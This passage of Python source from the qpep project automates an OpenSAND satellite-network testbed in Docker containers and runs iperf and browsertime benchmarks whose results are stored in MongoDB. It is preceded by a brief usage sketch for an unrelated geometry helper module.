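A brief usage sketch of the helpers above follows. The image-name layout is inferred from `parse_name` (synset, model, then `a`/`e`/`t`/`d`-prefixed pose fields separated by underscores); the concrete name and the random cluster centers are made up for illustration.
```python
import numpy as np
from helperFunctions import parse_name, rotation_matrix, get_gamma  # assumes the module above is on the path

# Name layout inferred from parse_name: <synset>_<model>_a<az>_e<el>_t<ct>_d<dist>
name = "02691156_abc123_a030_e015_t000_d3.0"
synset_str, model_str, az, el, ct, d = parse_name(name)
print(synset_str, model_str, az, el, ct, d)

# Rotation matrices are orthonormal, so R @ R.T is (numerically) the identity.
R = rotation_matrix(az, el, ct)
print(np.allclose(R @ R.T, np.eye(3)))

# get_gamma derives a kernel width from the smallest squared distance between cluster centers.
centers = np.random.rand(16, 3)
print(get_gamma(centers))
```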
{
"source": "jhuwyler/qpep",
"score": 2
} |
#### File: qpep/opensand-testbed/testbeds.py
```python
import subprocess
import os
from loguru import logger
import nclib
import docker
import time
import xml.etree.ElementTree as ET
from dotenv import load_dotenv
load_dotenv()
class BasicTestbed(object):
def __init__(self, host_ip="192.168.1.199", display_number=0, linux=False):
self.host_ip = host_ip
self.display_number = display_number
self.linux = linux
def start_testbed(self):
# First, shut down any old running testbeds
logger.debug("Shutting Down Previous Testbeds")
subprocess.call(["docker-compose", "down"], stderr=subprocess.DEVNULL)
# The DISPLAY env variable points to an X server for showing OpenSAND UI
my_env = {**os.environ, 'DISPLAY': str(self.host_ip) + ":" + str(self.display_number)}
logger.debug("Starting Testbed Containers")
# Start the docker containers
subprocess.call(["docker-compose", "up", "-d"], env=my_env)
# Wait for the opensand container to initialize then send a command to run the simulation
logger.debug("Starting Opensand Platform")
opensand_launched = False
while not opensand_launched:
try:
nc = nclib.Netcat(('localhost', int(os.getenv('SAT_PORT_NUMBER'))), verbose=False)
nc.recv_until(b'help')
nc.recv()
nc.send(b'status\n')
response = nc.recv()
opensand_launched = ('SAT' in str(response)) and ('GW0' in str(response)) and ('ST1' in str(response))
except nclib.errors.NetcatError:
continue
time.sleep(1) # it often takes a little while for Opensand to identify all hosts
logger.debug("Launching Opensand Simulation")
nc.send(b'start\n')
simulation_running = False
while not simulation_running:
nc.send(b'status\n')
response = str(nc.recv())
# wait for all three components (satellite, terminal and gateway) to start running
simulation_running = response.count('RUNNING') > 3
# now that the network is running, it is possible to add ip routes from user terminal through the network
logger.debug("Connecting User Terminal to Satellite Spot Beam")
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
terminal_container.exec_run("/sbin/ip route delete default")
terminal_container.exec_run("/sbin/ip route add default via " + str(os.getenv("GW_NETWORK_HEAD")) + ".0.3")
logger.success("OpeSAND Testbed Running")
def stop_testbed(self):
logger.debug("Shutting Down Previous Testbeds")
subprocess.call(["docker-compose", "down"])
def connect_terminal_workstation(self):
logger.debug("Starting User Workstation")
docker_client = docker.from_env()
workstation_container = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
logger.debug("Adding External Route to Docker Host for GUI Services")
workstation_container.exec_run("ip route add " + str(self.host_ip) + " via " + str(os.getenv("GUI_NETWORK_HEAD"))+".0.1 dev eth1")
logger.debug("Connecting User Workstation to Satellite Router")
workstation_container.exec_run("ip route del default")
workstation_container.exec_run("ip route add default via " + str(os.getenv("ST_NETWORK_HEAD"))+".0.4")
logger.success("Client Workstation Connected to Satellite Network")
def connect_sitespeed_workstation(self):
logger.debug("Starting Sitespeed Workstation")
docker_client = docker.from_env()
sitespeed_container = docker_client.containers.get(os.getenv("SITESPEED_CONTAINER_NAME"))
sitespeed_container.exec_run("ip route del default")
sitespeed_container.exec_run("ip route add default via " + str(os.getenv("ST_NETWORK_HEAD"))+".0.4")
logger.success("Sitespeed Workstation Connected to Satellite Network")
def launch_wireshark(self):
logger.debug("Starting Wireshark on Satellite Endpoint")
docker_client = docker.from_env()
satellite_container = docker_client.containers.get(os.getenv("SAT_CONTAINER_NAME"))
satellite_container.exec_run("wireshark", detach=True)
def launch_web_browser(self):
logger.debug("Launching Web Browser on User Workstation")
docker_client = docker.from_env()
workstation_container = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
workstation_container.exec_run("qupzilla", detach=True)
def set_downlink_attenuation(self, attenuation_value=0):
logger.debug("Setting OpenSAND Downlink Attenuation to " + str(attenuation_value))
gw_path = 'satellite/attenuation_scenario/gw0/plugins/ideal.conf'
st_path = 'satellite/attenuation_scenario/st1/plugins/ideal.conf'
gw_conf = ET.parse(gw_path)
st_conf = ET.parse(st_path)
xml_confs = [gw_conf.getroot(), st_conf.getroot()]
for conf in xml_confs:
attenuation_settings = conf.findall('ideal/ideal_attenuations/ideal_attenuation')
for setting in attenuation_settings:
if setting.attrib["link"] == "down":
setting.set("attenuation_value", str(attenuation_value))
gw_conf.write(gw_path)
st_conf.write(st_path)
logger.debug("Updated Downlink Attenuations")
def set_plr_percentage(self, plr_percentage, st_out=False, gw_out=True):
logger.debug("Configuring Packet Loss Rate")
docker_client = docker.from_env()
containers_to_mod = []
if st_out:
logger.debug("Setting PLR for ST->GW at " + str(plr_percentage))
containers_to_mod.append(docker_client.containers.get(os.getenv("ST_CONTAINER_NAME")))
if gw_out:
logger.debug("Setting PLR for GW->ST at " + str(plr_percentage))
containers_to_mod.append(docker_client.containers.get(os.getenv("GW_CONTAINER_NAME")))
for container in containers_to_mod:
response = container.exec_run('/sbin/tc qdisc change dev opensand_tun root netem loss ' + str(plr_percentage) + "%", stderr=True, stdout=True)
if "RTNETLINK" in str(response.output):
container.exec_run('/sbin/tc qdisc add dev opensand_tun root netem loss ' + str(plr_percentage) + "%", stderr=True, stdout=True)
logger.debug("Updated PLR to " + str(plr_percentage) + "%")
def run_attenuation_scenario(self):
logger.debug("Running Attenuation Scenario")
# wait to connect to opensand
opensand_launched = False
nc = None
while not opensand_launched:
try:
nc = nclib.Netcat(('localhost', int(os.getenv('SAT_PORT_NUMBER'))), verbose=False)
nc.recv_until(b'help')
nc.recv()
opensand_launched = True
except:
continue
logger.debug("Connected to NC Listener")
# stop running scenarios if any
nc.send(b'stop\n')
nc.recv_until(b'OK', timeout=10)
nc.recv()
# opensand reports that the testbed has stopped a little before it actually has
time.sleep(1)
# load attenuation scenario
nc.send(b'scenario attenuation_scenario\n')
nc.recv_until(b'OK', timeout=10)
nc.recv()
# start new scenario
nc.send(b'start\n')
nc.recv_until(b'OK', timeout=10)
logger.debug("Scenario Restarted")
nc.recv()
# ensure that the terminal modem is still connected
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
#terminal_container.exec_run("/sbin/ip route delete default")
terminal_container.exec_run("/sbin/ip route add default via " + str(os.getenv("GW_NETWORK_HEAD"))+".0.3")
logger.debug("Attenuation Scenario Launched")
class LeoTestbed(BasicTestbed):
def start_testbed(self):
# First, shut down any old running testbeds
logger.debug("Shutting Down Previous Testbeds")
subprocess.call(["docker-compose", "down"], stderr=subprocess.DEVNULL)
# The DISPLAY env variable points to an X server for showing OpenSAND UI
my_env = {**os.environ, 'DISPLAY': str(self.host_ip) + ":" + str(self.display_number)}
logger.debug("Starting Testbed Containers")
# Start the docker containers
subprocess.call(["docker-compose", "up", "-d"], env=my_env)
# Wait for the opensand container to initialize then send a command to run the simulation
logger.debug("Starting Opensand Platform")
opensand_launched = False
while not opensand_launched:
try:
nc = nclib.Netcat(('localhost', int(os.getenv('SAT_PORT_NUMBER'))), verbose=False)
nc.recv_until(b'help')
nc.recv()
nc.send(b'status\n')
response = nc.recv()
opensand_launched = ('SAT' in str(response)) and ('GW0' in str(response)) and ('ST1' in str(response))
except nclib.errors.NetcatError:
continue
logger.debug("Loading Iridium Delay Simulation")
nc.send(b'scenario delay_scenario\n')
nc.recv_until(b'OK', timeout=10)
nc.recv()
time.sleep(1) # it often takes a little while for Opensand to identify all hosts
logger.debug("Launching Opensand Simulation")
nc.send(b'start\n')
simulation_running = False
while not simulation_running:
nc.send(b'status\n')
response = str(nc.recv())
# wait for all three components (satellite, terminal and gateway) to start running
simulation_running = response.count('RUNNING') > 3
# now that the network is running, it is possible to add ip routes from user terminal through the network
logger.debug("Connecting User Terminal to Satellite Spot Beam")
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
terminal_container.exec_run("/sbin/ip route delete default")
terminal_container.exec_run("/sbin/ip route add default via " + str(os.getenv("GW_NETWORK_HEAD")) + ".0.3")
logger.success("OpeSAND Testbed Running")
class BasicPEPTestbed(object):
def __init__(self, host_ip="192.168.1.199", display_number=0, linux=False):
self.host_ip = host_ip
self.display_number = display_number
self.linux = linux
def start_testbed(self):
# First, shut down any old running testbeds
logger.debug("Shutting Down Previous Testbeds")
subprocess.call(["docker-compose", "down"], stderr=subprocess.DEVNULL)
# The DISPLAY env variable points to an X server for showing OpenSAND UI
my_env = {**os.environ, 'DISPLAY': str(self.host_ip) + ":" + str(self.display_number)}
logger.debug("Starting Testbed Containers")
# Start the docker containers
subprocess.call(["docker-compose", "up", "-d"], env=my_env)
# Wait for the opensand container to initialize then send a command to run the simulation
logger.debug("Starting Opensand Platform")
opensand_launched = False
while not opensand_launched:
try:
nc = nclib.Netcat(('localhost', int(os.getenv('SAT_PORT_NUMBER'))), verbose=False)
nc.recv_until(b'help')
nc.recv()
nc.send(b'status\n')
response = nc.recv()
opensand_launched = ('SAT' in str(response)) and ('GW0' in str(response)) and ('ST1' in str(response))
except nclib.errors.NetcatError:
continue
time.sleep(1) # it often takes a little while for Opensand to identify all hosts
logger.debug("Launching Opensand Simulation")
nc.send(b'start\n')
simulation_running = False
while not simulation_running:
nc.send(b'status\n')
response = str(nc.recv())
# wait for all three components (satellite, terminal and gateway) to start running
simulation_running = response.count('RUNNING') > 3
# now that the network is running, it is possible to add ip routes from user terminal through the network
logger.debug("Connecting User Terminal to Satellite Spot Beam")
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
terminal_container.exec_run("/sbin/ip route delete default")
terminal_container.exec_run("/sbin/ip route add default via " + str(os.getenv("GW_NETWORK_HEAD")) + ".0.3")
logger.debug("Starting PEPsal on terminal workstation")
terminal_client = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
terminal_client.exec_run("bash /opensand_config/launch_pepsal.sh")
logger.debug("Deploying PEPsal on Gateway Endpoint")
gateway_client = docker_client.containers.get(os.getenv("GW_CONTAINER_NAME"))
gateway_client.exec_run("bash /opensand_config/launch_pepsal.sh")
logger.success("OpeSAND Testbed Running")
def stop_testbed(self):
logger.debug("Shutting Down Previous Testbeds")
subprocess.call(["docker-compose", "down"])
def connect_terminal_workstation(self):
logger.debug("Starting User Workstation")
docker_client = docker.from_env()
workstation_container = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
logger.debug("Adding External Route to Docker Host for GUI Services")
workstation_container.exec_run("ip route add " + str(self.host_ip) + " via " + str(os.getenv("GUI_NETWORK_HEAD"))+".0.1 dev eth1")
logger.debug("Connecting User Workstation to Satellite Router")
workstation_container.exec_run("ip route del default")
workstation_container.exec_run("ip route add default via " + str(os.getenv("ST_NETWORK_HEAD"))+".0.4")
logger.success("Client Workstation Connected to Satellite Network")
def connect_sitespeed_workstation(self):
logger.debug("Starting Sitespeed Workstation")
docker_client = docker.from_env()
sitespeed_container = docker_client.containers.get(os.getenv("SITESPEED_CONTAINER_NAME"))
sitespeed_container.exec_run("ip route del default")
sitespeed_container.exec_run("ip route add default via " + str(os.getenv("ST_NETWORK_HEAD"))+".0.4")
logger.success("Sitespeed Workstation Connected to Satellite Network")
def launch_wireshark(self):
logger.debug("Starting Wireshark on Satellite Endpoint")
docker_client = docker.from_env()
satellite_container = docker_client.containers.get(os.getenv("SAT_CONTAINER_NAME"))
satellite_container.exec_run("wireshark", detach=True)
def launch_web_browser(self):
logger.debug("Launching Web Browser on User Workstation")
docker_client = docker.from_env()
workstation_container = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
workstation_container.exec_run("qupzilla", detach=True)
def set_downlink_attenuation(self, attenuation_value=0):
logger.debug("Setting OpenSAND Downlink Attenuation to " + str(attenuation_value))
gw_path = 'satellite/attenuation_scenario/gw0/plugins/ideal.conf'
st_path = 'satellite/attenuation_scenario/st1/plugins/ideal.conf'
gw_conf = ET.parse(gw_path)
st_conf = ET.parse(st_path)
xml_confs = [gw_conf.getroot(), st_conf.getroot()]
for conf in xml_confs:
attenuation_settings = conf.findall('ideal/ideal_attenuations/ideal_attenuation')
for setting in attenuation_settings:
if setting.attrib["link"] == "down":
setting.set("attenuation_value", str(attenuation_value))
gw_conf.write(gw_path)
st_conf.write(st_path)
logger.debug("Updated Downlink Attenuations")
def set_plr_percentage(self, plr_percentage, st_out=False, gw_out=True):
logger.debug("Configuring Packet Loss Rate")
docker_client = docker.from_env()
containers_to_mod = []
if st_out:
logger.debug("Setting PLR for ST->GW at " + str(plr_percentage))
containers_to_mod.append(docker_client.containers.get(os.getenv("ST_CONTAINER_NAME")))
if gw_out:
logger.debug("Setting PLR for GW->ST at " + str(plr_percentage))
containers_to_mod.append(docker_client.containers.get(os.getenv("GW_CONTAINER_NAME")))
for container in containers_to_mod:
response = container.exec_run('/sbin/tc qdisc change dev opensand_tun root netem loss ' + str(plr_percentage) + "%", stderr=True, stdout=True)
if "RTNETLINK" in str(response.output):
container.exec_run('/sbin/tc qdisc add dev opensand_tun root netem loss ' + str(plr_percentage) + "%", stderr=True, stdout=True)
logger.debug("Updated PLR to " + str(plr_percentage) + "%")
def run_attenuation_scenario(self):
logger.debug("Running Attenuation Scenario")
# wait to connect to opensand
opensand_launched = False
nc = None
while not opensand_launched:
try:
nc = nclib.Netcat(('localhost', int(os.getenv('SAT_PORT_NUMBER'))), verbose=False)
nc.recv_until(b'help')
nc.recv()
opensand_launched = True
except:
continue
logger.debug("Connected to NC Listener")
# stop running scenarios if any
nc.send(b'stop\n')
nc.recv_until(b'OK', timeout=10)
nc.recv()
# opensand reports that the testbed has stopped a little before it actually has
time.sleep(1)
# load attenuation scenario
nc.send(b'scenario attenuation_scenario\n')
nc.recv_until(b'OK', timeout=10)
nc.recv()
# start new scenario
nc.send(b'start\n')
nc.recv_until(b'OK', timeout=10)
logger.debug("Scenario Restarted")
nc.recv()
# ensure that the terminal modem is still connected
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
#terminal_container.exec_run("/sbin/ip route delete default")
terminal_container.exec_run("/sbin/ip route add default via " + str(os.getenv("GW_NETWORK_HEAD"))+".0.3")
logger.debug("Attenuation Scenario Launched")
```
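A hypothetical driver for the testbed classes above is sketched below; it assumes the docker-compose project and the `.env` variables referenced in `testbeds.py` (`SAT_PORT_NUMBER`, `ST_CONTAINER_NAME`, and so on) are available on the host.
```python
# Hypothetical driver script; parameters are illustrative only.
from testbeds import BasicTestbed

def main():
    testbed = BasicTestbed(host_ip="192.168.1.199", display_number=0)
    try:
        testbed.start_testbed()                 # compose up + start the OpenSAND simulation
        testbed.connect_terminal_workstation()  # route the client workstation via the satellite terminal
        testbed.set_plr_percentage(2, st_out=False, gw_out=True)  # 2% loss on the GW->ST direction
        testbed.launch_web_browser()            # browse over the emulated link
    finally:
        testbed.stop_testbed()

if __name__ == "__main__":
    main()
```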
#### File: qpep/realworld-testbed/benchmarks.py
```python
from statistics import mean
from loguru import logger
from abc import ABC, abstractmethod
import docker
import json
import time
import re
from pymongo import MongoClient
import pymongo
from datetime import datetime
import os
from dotenv import load_dotenv
load_dotenv()
load_dotenv(str(os.getenv("SERVER_ENV")))
load_dotenv(str(os.getenv("CLIENT_ENV")))
alexa_top_20 = [
"https://www.google.com",
"https://www.youtube.com",
"https://www.tmall.com",
"https://www.facebook.com",
"https://www.baidu.com",
"https://www.qq.com",
"https://www.sohu.com",
"https://www.taobao.com",
"https://www.360.cn",
"https://www.jd.com",
"https://www.yahoo.com",
"https://www.amazon.com",
"https://www.wikipedia.org",
"https://www.weibo.com",
"https://www.sina.com.cn",
"https://www.reddit.com",
"https://www.live.com",
"https://www.netflix.com",
"https://www.okezone.com",
"https://www.vk.com"
]
class Benchmark(ABC):
def __init__(self, name=""):
self.results = {}
self.name = name
@abstractmethod
def run(self):
pass
def print_results(self):
print(self.results)
def save_results_to_file(self, filename):
with open(filename, 'w') as outfile:
json.dump(self.results, outfile)
def push_to_db(self, collection_name, data):
try:
client = MongoClient(os.getenv("FIRST_DB_LOGIN_STR"), connectTimeoutMS=3000,serverSelectionTimeoutMS=5000)
logger.debug(client.server_info())
except pymongo.errors.ServerSelectionTimeoutError:
logger.warning('Could not connect to DB Server '+os.getenv("FIRST_DB_NAME"))
try:
client = MongoClient(os.getenv("SECOND_DB_LOGIN_STR"), connectTimeoutMS=3000,serverSelectionTimeoutMS=5000)
logger.debug(client.server_info())
except pymongo.errors.ServerSelectionTimeoutError:
logger.warning('Could not connect to DB Server '+os.getenv("SECOND_DB_NAME"))
logger.warning('Could not upload results to DB')
else:
db = client[os.getenv("DB_NAME")]
db[collection_name].insert_one(data)
logger.debug('uploaded to DB Server '+os.getenv("SECOND_DB_NAME"))
else:
db = client[os.getenv("DB_NAME")]
db[collection_name].insert_one(data)
logger.debug('uploaded to DB Server '+os.getenv("FIRST_DB_NAME"))
@abstractmethod
def save_results_to_db(self, scenario_name, testbed_name):
pass
def make_keys_mongoDB_compatible(self, data):
# MongoDB does not accept '.' in keys so we need to replace them
new_data = {}
for key in data.keys():
new_key = key.replace(".","-")
new_data[new_key] = data[key]
return new_data
class IperfBenchmark(Benchmark):
def __init__(self, file_sizes, server_address=os.getenv("IPERF_SERVER_ADDRESS"), bw_limit="8000M", reset_on_run=True, iterations=1):
self.file_sizes = file_sizes
self.bw_limit = bw_limit
self.reset_on_run = reset_on_run
self.server_address = server_address
self.iterations = iterations
super().__init__(name="IPerf")
def run(self):
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_workstation.exec_run("wget http://1.1.1.1") #use this to warm up vpns/peps
for i in range(0, self.iterations):
for file_size in self.file_sizes:
try:
test_results = self.run_iperf_test(file_size, self.reset_on_run, self.bw_limit)
except KeyboardInterrupt:
break
except:
logger.info("Iperf measurement Failed - Probably Docker Connection issue")
test_results = {
"sent_bytes": 0,
"sent_bps": 0,
"received_bytes": 0,
"received_bps": 0
}
result_name = "iperf_" + str(round(file_size/1000000, 3)) + "mb"
if result_name not in self.results.keys():
self.results[result_name] = {}
for key in test_results.keys():
self.results[result_name][key] = [test_results[key]]
else:
for key in test_results.keys():
self.results[result_name][key].append(test_results[key])
print("Interim Results (Iter:", i+1, " of ", self.iterations, "):", self.results)
def run_iperf_test(self, transfer_bytes, reset_on_run, bw_limit, with_timeout=True, timeout=600):
logger.debug("Starting iperf server")
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
gateway_workstation = docker_client_cloud.containers.get(os.getenv('WS_GW_CONTAINER_NAME'))
if reset_on_run:
gateway_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
gateway_workstation.exec_run("iperf3 -s", detach=True)
logger.debug("Starting iperf client")
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
if reset_on_run:
terminal_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
if with_timeout:
exit_code, output = terminal_workstation.exec_run("/usr/bin/timeout --signal=SIGINT " + str(timeout) +" /usr/bin/iperf3 --no-delay -b "+bw_limit+" -c " + str(self.server_address)+ " -R --json -n " + str(transfer_bytes))
else:
exit_code, output = terminal_workstation.exec_run("iperf3 --no-delay -b "+bw_limit+" -c " + str(self.server_address)+ " -R --json -n " + str(transfer_bytes))
json_string = output.decode('unicode_escape').rstrip('\n').replace('Linux\n', 'Linux') # there's an error in iperf3's json output here
try:
test_result = json.loads(json_string)
except:
json_string = "error - control socket has closed unexpectedly"
if "error - control socket has closed unexpectedly" in json_string:
logger.debug("IPerf connect socket lost, download failed")
return {
"sent_bytes": 0,
"sent_bps": 0,
"received_bytes": 0,
"received_bps": 0
}
try:
logger.debug("Iperf Result: " + str(test_result["end"]["sum_sent"]["bits_per_second"]/1000000) +
"/" + str(test_result["end"]["sum_received"]["bits_per_second"]/1000000))
except:
logger.error("Unable to parse iperf result")
print(json_string)
return {
"sent_bytes": 0,
"sent_bps": 0,
"received_bytes": 0,
"received_bps": 0
}
return {
"sent_bytes": test_result["end"]["sum_sent"]["bytes"],
"sent_bps": test_result["end"]["sum_sent"]["bits_per_second"],
"received_bytes": test_result["end"]["sum_received"]["bytes"],
"received_bps": test_result["end"]["sum_received"]["bits_per_second"],
}
def print_results(self):
print("Full Results: ")
print(self.results)
print("~"*25)
print("Average Speeds: ")
for result_key in self.results.keys():
print(result_key, "sent_bps:", mean(self.results[result_key]["sent_bps"]) / 1000000)
print(result_key, "received_bps:", mean(self.results[result_key]["received_bps"])/ 1000000)
def save_results_to_db(self, scenario_name, testbed_name):
data ={}
now = datetime.now()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
try:
exit_code, output = terminal_workstation.exec_run("ping -c 1 google.ch")
except:
logger.warning("Ping measurement failed")
try:
string = output.decode()
ping = re.findall("time=([0-9]+)", string)[0]
except:
logger.warning("Could not parse ping output.")
ping = "9999"
logger.debug("Ping[ms]:"+ping)
data.update({
"date": now,
"testbed": testbed_name,
"scenario": scenario_name,
"ping": int(ping),
"bw_limit": self.bw_limit,
"measurements": self.make_keys_mongoDB_compatible(self.results)
})
logger.debug(data)
if data["measurements"] != {}:
logger.debug("Uploading to DB")
self.push_to_db("iperf_TCP",data)
class IperfUDPBenchmark(Benchmark):
def __init__(self, file_sizes, bw_limit="50M", iterations=1):
self.file_sizes = file_sizes
self.bw_limit = bw_limit
self.iterations = iterations
super().__init__(name="IPerfUDP")
def run(self):
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_workstation.exec_run("wget http://1.1.1.1") #use this to warm up vpns/peps
for i in range(0, self.iterations):
for file_size in self.file_sizes:
try:
test_results = self.run_iperf_test(file_size, self.bw_limit)
except KeyboardInterrupt:
break
except:
logger.info("Iperf measurement Failed - Probably Docker Connection issue")
test_results = {
'seconds': 0,
'bytes': 0,
'bits_per_second': 0,
'lost_packets': 0,
'packets': 0,
'lost_percent': 0
}
result_name = "iperf_" + str(round(file_size/1000000, 3)) + "mb"
if result_name not in self.results.keys():
self.results[result_name] = {}
for key in test_results.keys():
self.results[result_name][key] = [test_results[key]]
else:
for key in test_results.keys():
self.results[result_name][key].append(test_results[key])
print("Interim Results (Iter:", i+1, " of ", self.iterations, "):", self.results)
def run_iperf_test(self, transfer_bytes, bw_limit, with_timeout=True, timeout=600):
logger.debug("Starting iperf server")
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
gateway_workstation = docker_client_cloud.containers.get(os.getenv('WS_GW_CONTAINER_NAME'))
gateway_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
gateway_workstation.exec_run("iperf3 -s", detach=True)
logger.debug("Starting iperf client")
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
exit_code, output = terminal_workstation.exec_run("iperf3 -u -b "+bw_limit+" --no-delay -c " + str(os.getenv("IPERF_SERVER_ADDRESS"))+ " -R --json -n " + str(transfer_bytes))
json_string = output.decode('unicode_escape').rstrip('\n').replace('Linux\n', 'Linux') # there's an error in iperf3's json output here
try:
test_result = json.loads(json_string)
except:
json_string = "error - control socket has closed unexpectedly"
if "error - control socket has closed unexpectedly" in json_string:
logger.debug("IPerf connect socket lost, download failed")
return {
"seconds": 0,
"bytes": 0,
"bits_per_second": 0,
"lost_packets": 0,
"packets": 0,
"lost_percent": 0
}
try:
logger.debug("Iperf Result: " + str(test_result["end"]["sum"]["bits_per_second"]/1000000) +
"/" + str(test_result["end"]["sum"]["lost_percent"])+"%")
except:
logger.error("Unable to parse iperf result")
print(json_string)
return {
"seconds": 0,
"bytes": 0,
"bits_per_second": 0,
"lost_packets": 0,
"packets": 0,
"lost_percent": 0
}
return {
"seconds": test_result["end"]["sum"]["seconds"],
"bytes": test_result["end"]["sum"]["bytes"],
"bits_per_second": test_result["end"]["sum"]["bits_per_second"],
"lost_packets": test_result["end"]["sum"]["lost_packets"],
"packets": test_result["end"]["sum"]["packets"],
"lost_percent": test_result["end"]["sum"]["lost_percent"]
}
def print_results(self):
print("Full Results: ")
print(self.results)
print("~"*25)
print("Average Speeds: ")
for result_key in self.results.keys():
print(result_key, "bits_per_second:", mean(self.results[result_key]["bits_per_second"]) / 1000000)
print(result_key, "lost_percent:", mean(self.results[result_key]["lost_percent"]))
def save_results_to_db(self, scenario_name, testbed_name):
data ={}
now = datetime.now()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
try:
exit_code, output = terminal_workstation.exec_run("ping -c 1 google.ch")
except:
logger.warning("Ping measurement failed")
try:
string = output.decode()
ping = re.findall("time=([0-9]+)", string)[0]
except:
logger.warning("Could not parse ping output.")
ping = "9999"
logger.debug("Ping: "+ping)
data.update({
"date": now,
"testbed": testbed_name,
"scenario": scenario_name,
"ping": int(ping),
"bw_limit": self.bw_limit,
"measurements": self.make_keys_mongoDB_compatible(self.results)
})
print(data)
if data["measurements"] != {}:
self.push_to_db("iperf_UDP",data)
class ChannelCharBenchmark(Benchmark):
def __init__(self, send_time, bw_limit="5M", reset_on_run=True):
self.send_time = send_time
self.bw_limit = bw_limit
self.reset_on_run = reset_on_run
super().__init__(name="iperf_CH")
def run(self):
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_workstation.exec_run("wget http://1.1.1.1") #use this to warm up vpns/peps
try:
test_results = self.run_iperf_test(self.send_time, self.reset_on_run)
except KeyboardInterrupt:
logger.warning("Keyboard Interrupt")
except:
logger.info("Iperf measurement Failed - Probably Docker Connection issue")
test_results = []
self.results = test_results
def run_iperf_test(self,send_time, reset_on_run, timeout=600):
logger.debug("Starting iperf server")
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
gateway_workstation = docker_client_cloud.containers.get(os.getenv('WS_GW_CONTAINER_NAME'))
if reset_on_run:
gateway_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
gateway_workstation.exec_run("iperf3 -s", detach=True)
logger.debug("Starting iperf client")
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
if reset_on_run:
terminal_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
exit_code, output = terminal_workstation.exec_run("/usr/bin/timeout --signal=SIGINT " + str(timeout) +" /usr/bin/iperf3 --no-delay -c " + str(os.getenv("IPERF_SERVER_ADDRESS"))+ " -R --json -b "+str(self.bw_limit)+" -t "+str(self.send_time))
json_string = output.decode('unicode_escape').rstrip('\n').replace('Linux\n', 'Linux') # there's an error in iperf3's json output here
try:
test_result = json.loads(json_string)
except:
json_string = "error - control socket has closed unexpectedly"
if "error - control socket has closed unexpectedly" in json_string:
logger.debug("IPerf connect socket lost, download failed")
return []
try:
logger.debug("Iperf Result: " + str(test_result["end"]["sum_sent"]["bits_per_second"]/1000000) +
"/" + str(test_result["end"]["sum_received"]["bits_per_second"]/1000000))
except:
logger.error("Unable to parse iperf result")
print(json_string)
return []
return [ result["sum"]["bits_per_second"] for result in test_result["intervals"]]
def print_results(self):
print("~"*25)
print("Full Results: ")
print(self.results)
print("~"*25)
def save_results_to_db(self, scenario_name, testbed_name):
data ={}
now = datetime.now()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
try:
exit_code, output = terminal_workstation.exec_run("ping -c 1 google.ch")
except:
logger.warning("Ping measurement failed")
try:
string = output.decode()
ping = re.findall("time=([0-9]+)", string)[0]
except:
logger.warning("Could not parse ping output.")
ping = "9999"
logger.debug("Ping[ms]:"+ping)
data.update({
"date": now,
"testbed": testbed_name,
"scenario": scenario_name,
"ping": int(ping),
"bw_limit": self.bw_limit,
"measurements": self.results
})
logger.debug(data)
if data["measurements"] != []:
logger.debug("Uploading to DB")
self.push_to_db("iperf_CH",data)
class SitespeedBenchmark(Benchmark):
def __init__(self, hosts=alexa_top_20, iterations=1, average_only=False, scenario=None, sub_iterations=1):
self.hosts = hosts
self.iterations = iterations
self.average_only = average_only
super().__init__(name="SiteSpeed")
self.results = {}
self.errors = 0
self.scenario = scenario
self.sub_iterations = sub_iterations
def run(self):
logger.debug("Launching SiteSpeed.io Tests")
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_workstation.exec_run("wget http://1.1.1.1") #use this to warm up vpns/peps
host_string = ''
for i in range(0, self.iterations):
for host in self.hosts:
host_string = host + " "
try:
host_result = terminal_workstation.exec_run('/usr/bin/browsertime -n ' + str(self.sub_iterations) +' --headless --browser firefox --cacheClearRaw --firefox.geckodriverPath /usr/bin/geckodriver --firefox.preference network.dns.disableIPv6:true --video=false --visualMetrics=false --visualElements=false ' + str(host_string))
except KeyboardInterrupt:
break
except:
logger.debug("Could not get result for "+str(host)+" due to errors")
continue
matches = re.findall('Load: ([0-9.]+)([ms])', str(host_result))
if self.sub_iterations > 0:
